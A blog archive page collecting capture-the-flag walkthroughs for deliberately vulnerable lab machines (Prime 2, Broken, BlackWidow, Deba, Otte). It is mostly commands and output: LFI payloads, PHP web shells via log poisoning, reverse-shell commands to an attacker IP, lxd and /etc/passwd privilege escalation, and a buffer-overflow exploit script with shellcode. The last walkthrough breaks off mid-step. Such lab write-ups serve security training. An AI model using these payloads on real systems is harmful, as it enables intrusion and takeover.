分类目录归档:生活与思考
Vulnhub Prime (2021): 2 Walkthrough
Vulnhub Prime (2021): 2 Walkthrough
https://www.vulnhub.com/entry/prime-2021-2,696/
Scan ports.
# Nmap 7.91 scan initiated Wed May 12 17:59:43 2021 as: nmap -sV -sC -p- -oN ports.log 192.168.33.139
Nmap scan report for 192.168.33.139 (192.168.33.139)
Host is up (0.0041s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 0a:16:3f:c8:1a:7d:ff:f5:7a:66:05:63:76:7c:5a:95 (RSA)
| 256 7f:47:44:cc:d1:c4:b7:54:de:4f:27:f2:39:38:ff:6e (ECDSA)
|_ 256 f5:d3:36:44:43:40:3d:11:9b:d1:a6:24:9f:99:93:f7 (ED25519)
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
|_http-server-header: Apache/2.4.46 (Ubuntu)
|_http-title: HackerCTF
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
10123/tcp open http SimpleHTTPServer 0.6 (Python 3.9.4)
|_http-server-header: SimpleHTTP/0.6 Python/3.9.4
|_http-title: Directory listing for /
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: 7h59m59s
|_nbstat: NetBIOS name: HACKERCTFLAB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-12T18:00:05
|_ start_date: N/A
Check smb share folders.
smbclient -L 192.168.33.139 fish-0 | 130 [08:45:41]
Enter WORKGROUP\kali's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
welcome Disk Welcome to Hackerctf LAB
IPC$ IPC IPC Service (hackerctflab server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
Found shell.php in /upload.
```
smbclient '\\192.168.33.139\welcome' fish-0 | 1 [08:47:16]
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu May 13 04:27:52 2021
.. D 0 Sat May 8 02:38:58 2021
.mysql_history H 18 Sat May 8 15:05:03 2021
.ssh DH 0 Thu May 13 04:29:18 2021
.profile H 807 Sat Mar 20 00:02:58 2021
upload D 0 Sun May 9 19:19:02 2021
.sudo_as_admin_successful H 0 Sat May 8 13:34:48 2021
.bash_logout H 220 Sat Mar 20 00:02:58 2021
.cache DH 0 Sat May 8 02:39:15 2021
something N 82 Sat May 8 00:18:09 2021
secrets N 0 Sat May 8 00:15:17 2021
.bash_history H 72 Sun May 9 19:23:26 2021
.bashrc H 3771 Sat Mar 20 00:02:58 2021
19475088 blocks of size 1024. 9885876 blocks available
smb: \> cd upload
smb: \upload\> dir
. D 0 Sun May 9 19:19:02 2021
.. D 0 Thu May 13 04:27:52 2021
shell.php A 35 Sun May 9 19:19:02 2021
19475088 blocks of size 1024. 9885872 blocks available
smb: \upload\> get shell.php
getting file \upload\shell.php of size 35 as shell.php (6.8 KiloBytes/sec) (average 6.8 KiloBytes/sec)
smb: \upload\>
Check shell.php.
cat shell.php smbclient-0 | 0 [08:48:39]
<?php echo system($_GET['cmd']);?>
Found user name jarves.
cat something fish-0 | 0 [09:29:34]
I wanted to make it my home directory. But idea must be changed.
Thanks,
jarves
Scan folders of port 80.
cat 80.log fish-0 | 0 [09:30:32]
/css (Status: 301) [Size: 314] [--> http://192.168.33.139/css/]
/server (Status: 301) [Size: 317] [--> http://192.168.33.139/server/]
/wp (Status: 301) [Size: 313] [--> http://192.168.33.139/wp/]
/index.html (Status: 200) [Size: 5761]
/images (Status: 301) [Size: 317] [--> http://192.168.33.139/images/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.33.139/javascript/]
Check vulnerability of wordpress, found 1 user and 1 vulnerable plugin.
wpscan --url http://192.168.33.139/wp/ -e u,ap --no-banner --api-token yourtoken --force --plugins-detection aggressive ... [+] gracemedia-media-player |
Location: http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/ | Latest Version: 1.0 (up to date) | Last Updated: 2013-07-21T15:09:00.000Z | Readme: http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/readme.txt | [!] Directory listing is enabled |
---|---|---|---|---|---|
Found By: Known Locations (Aggressive Detection) | |||||
- http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/, status: 200 | |||||
[!] 1 vulnerability identified: | |||||
[!] Title: GraceMedia Media Player 1.0 - Local File Inclusion (LFI) | |||||
References: | |||||
- https://wpscan.com/vulnerability/a4f5b10f-3386-45cc-9548-dd7bbea199d6 | |||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618 | |||||
- https://www.exploit-db.com/exploits/46537/ | |||||
- https://seclists.org/fulldisclosure/2019/Mar/26 |
...
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
The plugin has LFI vulnerability.
searchsploit gracemedia
Exploit Title | Path |
---|---|
WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion | php/webapps/46537.txt |
Check if LFI works.
curl '192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds
&cfg=../../../../../../../../../../etc/passwd'
root:x:0:0:root:/root:/bin/bash
...
jarves:x:1000:1000:jarves:/home/jarves:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
...
Check if LFI works.
curl '192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)⏎
Visit the following address.
Get reverse shell.
nc -nlvp 1234 ifconfig-0 | 0 [08:50:29]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.33.139.
Ncat: Connection from 192.168.33.139:49084.
bash: cannot set terminal process group (971): Inappropriate ioctl for device
bash: no job control in this shell
<t/plugins/gracemedia-media-player/templates/files$
<t/plugins/gracemedia-media-player/templates/files$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Another way to directly get ssh login as jarves is to directly upload authorized_keys through smb.
smbclient '\\192.168.33.139\welcome'
...
smb: \> mkdir .ssh
smb: \> cd .ssh
smb: .ssh\> put authorized_keys
putting file authorized_keys as .ssh\authorized_keys (183.9 kb/s) (average 183.9 kb/s)
smb: .ssh\> chmod 600 authorized_keys
Server doesn't support UNIX CIFS calls.
Check group of jarves.
jarves@hackerctflab:~$ id
uid=1000(jarves) gid=1000(jarves) groups=1000(jarves),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
Use the classic lxd vulnerability.
lxc image import ./alpine-v3.13-x86_64-20210405_2328.tar.gz --alias myimage
lxd init alpine:v3.12 mypool
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
Now we are root.
jarves@hackerctflab:~$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)
Upload authorized_keys to /root/.ssh, get ssh login directly.
ssh root@192.168.33.139
...
root@hackerctflab:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
hackerctflab
HackMyVm Broken Walkthrough
HackMyVm Broken Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Broken
Scan ports.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 1b:8d:f3:e3:56:64:af:54:df:10:f8:39:ac:ad:c9:2f (RSA)
| 256 77:c1:f3:e4:6b:96:0f:1e:5c:24:2e:4d:3e:4a:09:80 (ECDSA)
|_ 256 88:05:ef:7a:04:56:f0:59:62:a5:f8:40:32:24:8a:17 (ED25519)
80/tcp open http nginx 1.14.2
| http-robots.txt: 1 disallowed entry
|_/textpattern
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
Scan port 80.
gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
...
/index.html (Status: 200) [Size: 3]
/file.php (Status: 200) [Size: 0]
/robots.txt (Status: 200) [Size: 23]
robots.txt told us there is textpattern cms.
cat robots.txt
Disallow: /textpattern
Fuzz file.php for LFI.
wfuzz -u 'http://broken/file.php?FUZZ=../../../../../etc/passwd' -w /usr/share/wordlists/seclists/Discov
ery/Web-Content/big.txt --hh 0
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000007535: 200 27 L 40 W 1451 Ch "file"
Check passwd.
curl 'http://broken/file.php?file=../../../../etc/passwd'
root:x:0:0:root:/root:/bin/bash
...
heart:x:1000:1000:heart,,,:/home/heart:/bin/bash
...
Write shell code into nginx log file through agent string.
curl 'http://broken' -A '<?php system($_GET[c]); ?>'
:(
Check if shell code works.
curl 'http://broken/file.php?file=../../../../var/log/nginx/access.log&c=id'
...
192.168.56.150 - - [26/May/2021:22:44:55 -0400] "GET / HTTP/1.1" 200 3 "-" "uid=33(www-data) gid=33(www-data) groups=33(www-data)
Try get reverse shell code.
curl 'http://broken/file.php?file=../../../../var/log/nginx/access.log&c=nc%20192.168.56.150%201234%20-e%20/bin/bash'
In another terminal, listen to port and get shell.
nc -nlvp 1234 fish-0 | 0 [20:49:51]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:50004.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Check sudo.
ww-data@broken:~/html/textpattern/textpattern$ sudo -l
sudo -l
Matching Defaults entries for www-data on broken:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on broken:
(heart) NOPASSWD: /usr/bin/pydoc3.7
Run pydoc3.7 to get shell.
www-data@broken:/home/heart$ sudo -u heart /usr/bin/pydoc3.7 os
...
:!/bin/sh
...
$ id
id
uid=1000(heart) gid=1000(heart) groups=1000(heart),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
$ pwd
pwd
/home/heart
$
Check sudo again.
heart@broken:~$ sudo -l
Matching Defaults entries for heart on broken:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User heart may run the following commands on broken:
(ALL) NOPASSWD: /usr/bin/patch
Use patch to insert a new user root2 in /etc/passwd with root priviledge.
heart@broken:~$ cp /etc/passwd ./passwd_new
heart@broken:~$ openssl passwd mypass
qQdUCJYw6ARL6
heart@broken:~$ echo 'root2:qQdUCJYw6ARL6:0:0:root:/root:/bin/bash' >> passwd_new
heart@broken:~$ diff -u /etc/passwd ./passwd_new > passwd_patch
heart@broken:~$ sudo patch -i ./passwd_patch /etc/passwd
patching file /etc/passwd
heart@broken:~$ su root2
Password:
root@broken:/home/heart# id;hostname
uid=0(root) gid=0(root) groups=0(root)
broken
root@broken:/home/heart#
HackMyVm BlackWidow Walkthrough
HackMyVm BlackWidow Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=BlackWidow
Nmap scan ports.
nmap -sV -sC -p- -oN ports.log 192.168.56.100
Nmap scan report for 192.168.56.100 (192.168.56.100)
Host is up (0.0024s latency).
Not shown: 65526 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
...
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
...
2049/tcp open nfs_acl 3 (RPC #100227)
3128/tcp open http-proxy Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
38425/tcp open mountd 1-3 (RPC #100005)
41727/tcp open mountd 1-3 (RPC #100005)
43429/tcp open nlockmgr 1-4 (RPC #100021)
55311/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Check port 80.
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
===============================================================
/index.html (Status: 200) [Size: 84]
/docs (Status: 301) [Size: 315] [--> http://192.168.56.100/docs/]
/company (Status: 301) [Size: 318] [--> http://192.168.56.100/company/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.100/js/]
Check /company, found started.php.
~ gobuster dir -u http://192.168.56.100/company -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
-x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard -o 80_company.log
===============================================================
/index.html (Status: 200) [Size: 42271]
/assets (Status: 301) [Size: 325] [--> http://192.168.56.100/company/assets/]
/forms (Status: 301) [Size: 324] [--> http://192.168.56.100/company/forms/]
/changelog.txt (Status: 200) [Size: 1175]
/Readme.txt (Status: 200) [Size: 222]
/started.php (Status: 200) [Size: 42271]
Check sourcode of /company/index.html.
<!-- =======================================================
* Template Name: Arsha - v3.0.3
* Template URL: https://bootstrapmade.com/arsha-free-bootstrap-html-template-corporate/
* Author: BootstrapMade.com
* License: https://bootstrapmade.com/license/
========================================================
We are working to develop a php inclusion method using "file" parameter - Black Widow DevOps Team.
-->
Wfuzz LFI of started.php with parameter file.
~ wfuzz -u 'http://192.168.56.100/company/started.php?file=FUZZ' -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt --hh 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000060: 200 29 L 43 W 1582 Ch "../../../../../../../../../../../../../etc/passwd"
000000062: 200 29 L 43 W 1582 Ch "../../../../../../../../../../../../../../../../etc/passwd"
000000061: 200 29 L 43 W 1582 Ch "../../../../../../../../../../../../../../etc/passwd"
000000403: 200 55 L 55 W 727 Ch "../../../../../../../../../../../../../etc/group"
000000404: 200 55 L 55 W 727 Ch "../../../../../../../../../../../../../../etc/group"
We can read /etc/passwd now.
~ curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../etc/passwd'
root:x:0:0:root:/root:/bin/bash
...
viper:x:1001:1001:Viper,,,:/home/viper:/bin/bash
...
Let's fuzz some log files which we can read.
wfuzz -u "http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../..FUZZ" -w /usr/share/wordlists/logfiles.txt
...
000000031: 200 0 L 0 W 0 Ch "/var/log/vsftpd.log"
000000030: 200 0 L 0 W 0 Ch "/var/log/error.log"
000000032: 200 0 L 0 W 0 Ch "/var/log/message"
000000023: 200 0 L 0 W 0 Ch "/usr/local/apache/logs/error_log"
000000025: 200 0 L 0 W 0 Ch "/var/log/apache/error_log"
000000026: 200 0 L 0 W 0 Ch "/var/log/apache2/error_log"
000000018: 500 0 L 0 W 0 Ch "/var/log/apache2/access.log"
Take care the response code for /var/log/apache2/access.log is 500, all other file is 200. That's because we run gobuster many times, and access.log file is too big for curl. We reset the VM to original status. Then we can access the file through LFI.
Also, we noticed that browser agent string is in the log file, which can be modified to shell code.
~ curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log'
192.168.56.150 - - [25/May/2021:04:24:36 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 147 "-" "curl/7.74.0"
192.168.56.150 - - [25/May/2021:04:24:40 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 147 "-" "curl/7.74.0"
192.168.56.150 - - [25/May/2021:04:24:46 -0400] "GET /company/started.php HTTP/1.1" 200 7291 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
192.168.56.150 - - [25/May/2021:04:24:49 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 147 "-" "curl/7.74.0"
Set user agent to php shell code, and check if it works.
curl -A '<?php system($_GET[c]); ?>' http://192.168.56.100
<html>
<img src="wallpaper.jpg" alt="wallpaper" width="100%" height="100%">
</html>
~ curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log&c=id'
192.168.56.150 - - [25/May/2021:04:25:25 -0400] "GET / HTTP/1.1" 200 334 "-" "uid=33(www-data) gid=33(www-data) groups=33(www-data)
"
192.168.56.150 - - [25/May/2021:04:25:29 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 251 "-" "curl/7.74.0"
In order to get a reverse shell, I tried many ways, at last used the following method. Run a temporary http server locally, with a php shell named "r" at root folder.
sudo php -S 0.0.0.0:80
[Tue May 25 19:53:10 2021] PHP 7.4.15 Development Server (http://0.0.0.0:80) started
[Tue May 25 19:54:43 2021] 192.168.56.100:39630 Accepted
[Tue May 25 19:54:43 2021] 192.168.56.100:39630 [200]: (null) /r
[Tue May 25 19:54:43 2021] 192.168.56.100:39630 Closing
On VM, use curl to get reverse shell php named "r" and renamed it to "r.php".
curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log&c=curl%20http://192.168.56.150/r%20-o%20r.php'
Visit the php shell.
curl http://192.168.56.100/company/r.php
Then we get reverse shell.
nc -nlvp 1234 sudo-0 | 0 [19:54:47]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:48366.
Linux blackwidow 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux
05:01:50 up 37 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Found a strange string in /var/backups/auth.log, which is viper's password. (I think this step is the most hard.)
Dec 12 16:56:34 test sshd[29558]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.109 user=viper
Dec 12 16:56:43 test sshd[29560]: Invalid user ?V1p3r2020!? from 192.168.1.109 port 7090
Dec 12 16:56:44 test sshd[29560]: pam_unix(sshd:auth): check pass; user unknown
Check bash history of viper.
viper@blackwidow:~$ cat .bash_history
...
arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
ls
./arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
su root
Search file named arsenic.
viper@blackwidow:~$ find / -name arsenic 2>/dev/null
/home/viper/backup_site/assets/vendor/weapon/arsenic
Su root.
viper@blackwidow:~$ /home/viper/backup_site/assets/vendor/weapon/arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# id
uid=0(root) gid=1001(viper) groups=1001(viper)
HackMyVm Deba Walkthrough
HackMyVm Deba Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Deba
Scan ports, found 22, 80 and 3000 are open.
# Nmap 7.91 scan initiated Fri May 14 08:30:51 2021 as: nmap -sV -sC -p- -oN ports.log 192.168.56.100
Nmap scan report for 192.168.56.100 (192.168.56.100)
Host is up (0.0012s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 22:e4:1e:f3:f6:82:7b:26:da:13:2f:01:f9:d5:0d:5b (RSA)
| 256 7b:09:3e:d4:a7:2d:92:01:9d:7d:7f:32:c1:fd:93:5b (ECDSA)
|_ 256 56:fd:3d:c2:19:fe:22:24:ca:2c:f8:07:90:1d:76:87 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Scan port 80, found nothing. Check port 3000, looks like a node.js site.
[image-20210524174309208.png]
Use the classic Node.JS - 'node-serialize' Remote Code Execution POC at: https://www.exploit-db.com/exploits/49552.
Get reverse shell as www-data. Check sudo.
www-data@debian:/home/low$ sudo -l
sudo -l
Matching Defaults entries for www-data on debian:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on debian:
(ALL : low) NOPASSWD: /usr/bin/python3 /home/low/scripts/script.py
Check files and content of /home/low/scripts, we have write permission of main.py.
www-data@debian:/home/low/scripts$ ls -la
ls -la
total 16
drwxr-xr-x 2 low low 4096 may 7 17:59 .
drwxr-xr-x 8 low low 4096 may 7 23:45 ..
-rwxr-xr-x 1 www-data www-data 88 may 7 10:57 main.py
-rw-r--r-- 1 low low 80 may 7 10:44 script.py
www-data@debian:/home/low/scripts$ cat script.py
cat script.py
import main
import os
print("\n")
os.system("ip a | grep enp0s3")
print("\n")
www-data@debian:/home/low/scripts$ cat main.py
cat main.py
from os import system as main
print("\n")
print("Just main")
main("whoami")
print("\n")
Modify main.py to get shell as user low.
echo 'import os;os.system("/bin/bash");' > main.py
sudo -u low python3 /home/low/scripts/script.py
low@debian:~/scripts$ id
id
uid=1001(low) gid=1001(low) grupos=1001(low)
Upload id_rsa.pub to get ssh access as user low.
wget http://192.168.56.150/id_rsa.pub -O authorized_keys
chmod 600 authorized_keys
After login as low, check pspy64. The user debian with id 1000 will run /home/debian/Documentos/backup/dissapeared.py each minute.
2021/05/14 05:31:02 CMD: UID=0 PID=2240 | /usr/sbin/CRON -f
2021/05/14 05:31:02 CMD: UID=1000 PID=2241 | /usr/bin/python3 /home/debian/Documentos/backup/dissapeared.py
Create the file and write shell code in it.
low@debian:/home/debian/Documentos/backup$ echo 'import os;os.system("nc 192.168.56.150 2234 -e /bin/bash");' > dissapeared.py
Get reverse shell as user debain.
nc -nlvp 2234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::2234
Ncat: Listening on 0.0.0.0:2234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:45812.
id
uid=1000(debian) gid=1000(debian) grupos=1000(debian),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),114(lpadmin),115(scanner)
Spwan an interactive shell.
python3 -c 'import pty;pty.spawn("/bin/bash")'
Here, we can upload id_rsa.pub again, to get ssh login.
Check sudo again.
debian@debian:~$ sudo -l
Matching Defaults entries for debian on debian:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User debian may run the following commands on debian:
(ALL : root) NOPASSWD: /bin/wine /opt/Buffer-Overflow-Vulnerable-app/brainfuck.exe
Run brainfuck.exe, it will open port 9999 and receive user input.
image-20210524180541022.png
Dissassemble brainfuck.exe, the vulnerability is at get_reply function.
int __cdecl get_reply(char *Source)
{
size_t v1; // eax
char Destination[520]; // [esp+10h] [ebp-208h] BYREF
printf("[get_reply] s = [%s]\n", Source);
strcpy(Destination, Source);
v1 = strlen(Destination);
printf("[get_reply] copied %d bytes to buffer\n", v1);
return strcmp(Destination, "shitstorm\n");
}
The max length of user input string is 520, then 4 bytes for ebp, 4 bytes for return address. We can generate test string.
python3 -c "print('a'*520+'bbbb'+'cccc')" python3-0 | 1 [17:17:10]
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc
Test it on windows, debug it with ollydbg, the return address is JUST overwrited by 'cccc'.
[image-20210524172438560.png]
Brainfuck.exe also has jmp esp instruction.
ropper --file brainfuck.exe --search 'jmp esp' fish-0 | 0 [17:21:23]
[INFO] Load gadgets for section: .text
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: jmp esp
[INFO] File: brainfuck.exe
0x311712f3: jmp esp;
Then we can make pwn code with class shell code.
#!/usr/bin/python3
import socket
target_ip='192.168.56.100'
target_port=9999
recv_buf=4096
junk = b'a' *520+b'bbbb'
ret_addr=b'\xf3\x12\x17\x31'
#the classic shellcode
shell_code = b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80'
payload = b''
payload += junk
payload += ret_addr
payload +=shell_code
with socket.socket(socket.AF_INET,socket.SOCK_STREAM) as clientSock:
clientSock.connect((target_ip,target_port))
data_from_srv = clientSock.recv(recv_buf)
print(f"Reply --> {data_from_srv}")
print(f"Sending --> {payload}")
clientSock.sendall(payload)
Start brainfuck.exe with sudo, run exp.py at local machine, then we can get root shell.
HackMyVm Otte Walkthrough
HackMyVm Otte Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Otte
Scan ports first.
nmap -sV -sC -p- -oN ports.log 192.168.56.100
Nmap scan report for 192.168.56.100 (192.168.56.100)
Host is up (0.00099s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 ftp ftp 89 May 15 12:25 note.txt
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 e8:38:58:1b:75:c5:53:47:32:10:d4:12:79:69:c8:ad (RSA)
| 256 35:92:34:4e:cd:65:c6:08:20:76:35:ba:d9:09:64:65 (ECDSA)
|_ 256 a2:87:9f:60:a4:0d:c5:43:6a:4f:02:79:56:ff:6e:d9 (ED25519)
80/tcp open http Apache httpd 2.4.38
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Siemens - Root authentification
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 401 Unauthorized
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Visit ftp anonymous, get note.txt.
cat note.txt
Hi thomas ! I put on you personal folder the php code you asked me !
See you later +++
Visit port 80, need authentication.
[image-20210523214949625.png]
Following the hint, search default credentials of siemens router. (This step is hard for me because I never used siemens router)
https://www.192-168-1-1-ip.co/router/siemens/siemens/17622/
After some failure, we get the correct credentials.
root zP2wxY4uE
Then we can scan folder and files.
gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log -U root -P zP2wxY4uE
/index.php (Status: 200) [Size: 28]
/image (Status: 200) [Size: 47076]
/config.php (Status: 200) [Size: 0]
/thinkgeek.php (Status: 200) [Size: 28]
Fuzz thinkgeek.php.
wfuzz -u 'http://192.168.56.100/thinkgeek.php?FUZZ=id' -w /usr/share/seclists/Discovery/Web-Content/big.txt --basic root:zP2wxY4uE --hh 28
000007535: 200 0 L 0 W 0 Ch "file"
Try LFI.
curl -u root:zP2wxY4uE 'http://192.168.56.100/thinkgeek.php?file=../../../../etc/passwd'
root:x:0:0:root:/root:/bin/bash
...
thomas:x:1000:1000:thomas,,,:/home/thomas:/bin/bash
...
laetitia:x:1001:1001:,,,:/home/laetitia:/bin/bash
cedric:x:1002:1002:,,,:/home/cedric:/bin/bash
Follow the hint of note.txt, fuzz /home/thomas/*.php.
wfuzz -u 'http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/FUZZ.php' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --basic root:zP2wxY4uE --hh 0
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000016344: 200 2 L 3 W 20 Ch "shell"
Fuzz the parameter of shell.php.
